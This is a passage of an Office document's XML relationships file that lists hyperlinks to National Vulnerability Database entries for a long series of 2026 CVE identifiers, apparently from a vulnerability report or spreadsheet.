/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73021" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73026" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76967" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77503" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78447" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78448" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83498" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83942" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83952" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83954" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83955" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83967" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83968" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83969" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83970" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83971" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83972" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83973" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83974" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83975" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83976" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83977" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83978" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83979" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83980" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83981" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83982" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83983" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83985" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83986" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83987" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83995" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66767" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69683" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78623" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67376" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69342" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69397" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69514" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69539" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69599" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69803" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69804" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69929" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69930" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70065" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70124" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70587" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78523" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78574" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83989" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84001" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78627" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82061" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84387" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68893" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69340" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69366" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69536" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82076" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68884" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69287" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69379" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69466" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69473" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69501" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69567" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69578" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71340" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71342" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77485" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80093" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83940" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85360" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68833" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69415" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69490" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69566" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71329" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71348" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77892" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78451" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78579" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71339" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78625" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78630" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69469" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78545" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78550" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44766" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62801" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66816" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67369" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67383" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67386" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67389" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67390" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 